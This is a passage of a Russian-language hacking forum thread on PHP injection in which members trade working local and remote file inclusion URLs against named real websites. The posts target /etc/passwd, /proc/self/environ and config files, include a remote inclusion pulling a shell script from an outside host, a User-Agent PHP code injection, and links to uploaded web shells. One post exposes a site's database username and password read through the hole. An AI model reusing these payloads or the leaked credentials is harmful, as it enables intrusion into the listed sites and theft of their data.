PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.summerschoolalpbach.at/index.php?file=.htaccess
     
    _________________________
  2. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://aren.org/newsletter/2007-litha/action.php?num=../../../../../../../../../etc/passwd%00
    POST
     
  3. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    http://www.filllpg.co.uk/index.php?page=/etc/passwd
     
  4. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00
     
  5. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://shareaza.sourceforge.net/?id=../../../../../../../../../../etc/passwd%00
     
  6. jrxsystem

    jrxsystem Banned

    Joined:
    6 Jan 2011
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    Code:
    [COLOR=White][B]http://www.theschoolhouseinn.net/pkg/includes/cart.inc.php?dir_path=http://kabooos.persiangig.com/shell/2010.txt?[/B][/COLOR]
    Code:
    [COLOR=White][B]http://www.kamparkab.go.id/index.php.../etc/passwd%00[/B][/COLOR]
    Code:
    [B][COLOR=White]http://dev.peliton.net/Portals/0/h.asp;.jpg.jpg[/COLOR][/B]
    Code:
    [COLOR=White][B]http://navymemorial.org/Portals/0/Mast3rJ0int.asp;.jpg[/B][/COLOR]
    Code:
    [COLOR=White][B]http://www.vsa-software.com/mlsportfolio/index.php?content=../../../../../../etc/passwd%00[/B][/COLOR]
    Code:
    [COLOR=White][B]http://www.cazino-monteoru.ro/index.php?pg=../../../../etc/passwd[/B][/COLOR]
     
    1 person likes this.
  7. dirtybiz

    dirtybiz New Member

    Joined:
    28 Oct 2010
    Messages:
    28
    Likes Received:
    3
    Reputations:
    0
    PR ~6, в индексе почти 20 000 страниц :) может куми-нибудь пригодится)
     
  8. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://www.tierhilfe-spanien.de/thspa.php?inc=../../../../../../../etc/passwd%00
    http://www.albersfoundation.org/Albers.php?inc=../../../../../../../../../etc/passwd%00
     
    #1228 Gedj, 24 Jan 2011
    Last edited by a moderator: 24 Jan 2011
  9. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    h_ttp://www.kemtipp.ru/show.php?f=../../../../etc/passwd
     
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.sintraems.org.br/main.php?pg=/proc/self/environ

    Header:

    Code:
    Host
    User-Agent :[B][COLOR=DarkOrange] <?php phpinfo(); ?>[/COLOR][/B]
    Accept
    Accept-Language
    Accept-Encoding
    Accept-Charset
    Keep-Alive
    Connection
    
     
    _________________________
    1 person likes this.
  11. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    http://www.ra-dar.ru/index.php?path=../../../../etc/passwd
    http://www.ra-dar.ru/index.php?path=../htdocs/
    
     
    1 person likes this.
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.racetools.de/index.php?page=/etc/passwd
    http://www.soulbrasil.com/index.php?page=/proc/self/environ
    http://www.eschoolbc.com/?page=../../../../../../../../../../proc/self/fd/2%00
    http://www.undp.org.al/index.php?page=../../../../../../../../../../proc/self/fd/14%00
    http://www.bornathleticstore.com/blog.php?page=../../../../../../../../../proc/self/environ
    http://www.modelspromo.com/index.php?page=../../../../../../../../../../../../etc/my.cnf
    http://www.placeneeded.com/index.php?page=../../../../../../../../../../var/log/dmesg
    http://www.keewatinmaritimemuseum.com/?page=../../../../../../../../../../../proc/self/fd/7
    http://www.gardenhoodatlanta.com/admin/index.php?page=../../../../../../../../proc/self/fd/1
    http://www.khandelwalweds.com/index.php?id=../../../../../../../../proc/self/maps
    http://www.asuslaptop.com/index.php?page=../../../../../../../../../proc/sys/../self/cmdline
     
    _________________________
    4 people like this.
  13. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://www.avionews.com/index.php?corpo=../../../../../../../../../../etc/passwd
     
  14. Lestatkiy

    Lestatkiy Member

    Joined:
    27 Sep 2010
    Messages:
    50
    Likes Received:
    22
    Reputations:
    5
    http://www.dailymail.com/ap/ApWorld/201103181127?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index

    PHP:

    <?php
    //ini_set('display_errors', 1);
    //error_reporting(E_ALL);
        /*
            index.php
            Author:            Harry Helmich
            Created:        2006
            Description:    Primary controller for the application.

            Log:
            harry        2006-10-13    Added session processing.
            harry        2006-11-09    Code formatting.
            Alyssa        2007-06-28    Added code to check for php attacks
        */

        // Start a session for user tracking.
        
    @session_start();


        include_once(
    "util/form_functions.php");
        
        if ( !isset(
    $_SESSION['bLoggedIn']) || empty($_SESSION['bLoggedIn']) ){
            
    $_SESSION['bLoggedIn'] = false;

            
    /* Check if the user has set cookies through Remember Me */
            
    if(isset($_COOKIE['MPUserName']) && isset($_COOKIE['MPPassword'])){
                
    $userid $_COOKIE['MPUserName'];
                
    $password $_COOKIE['MPPassword'];
                
    $_POST['userid'] = $userid;
                
    $_POST['password'] = $password;
                
    login($userid,$password);
            }
        }
        



        
    // Display the header
        
    require_once("header.php");
        
    //echo '<div class="content">';

        

        /*
            Check for the page variable.  If it is empty or
            uninitialized, set it value to the default or
            home page.
        */
        


        
    if ( isset($_GET['page']) || !empty($_GET['page']) )
        {
        
            
    $page $_GET['page'];
            
                
        }else{
            
    $page "home";
        }
        
    $sanitycheck strpos($page"http");
        
        
        
        if (
    $sanitycheck === false) {
            
    // Include the specified page.
            //include(realpath(basename($page)));
                      
    include($page.".php");
        } 
        else {
            die(
    "Possible PHP Injection Attack");
        }    
        
        
    //echo "</div>";

         // Diplay the footer
         
    require_once("footer.php");
    ?

    интересная протекция )
     
    _________________________
    3 people like this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    читалюга

    http://www.vintagetoys.com/help.php?template=../../../../../../home/twinkles/public_html/dbconnection.php%00

    PHP:
    <?php
    $Query 
    mysql_connect ("localhost""twinkles_VTDB""reTEP58") or die ("Vintage Toys is not available at the moment.  Please try again later.");
    mysql_select_db("twinkles_vintagetoys"$Query);
    ?>
     
    _________________________
    4 people like this.
  17. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    [IP 208.125.234.183]
    Code:
    [COLOR=DarkOrange]http://web2.paulsmiths[COLOR=Blue].edu[/COLOR]/PAGE=../etc/passwd[/COLOR]
     
  18. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00
    Пользуйтесь на здоровье!
     
    #1238 LiRvD082, 18 Apr 2011
    Last edited by a moderator: 18 Apr 2011
    2 people like this.
  19. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    LFI :: kruta.ee :: PR - 3
    Code:
    _http://www.kruta.ee/main.php?lang=est&pg=../../../../../../data03/virt6224/domeenid/www.kruta.ee/htdocs/func
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://people.clarkson.edu/~williaem/ew/home2.php?file=/etc/passwd
    allow_url_include = on + никакой фильтрации
     
    _________________________
    2 people like this.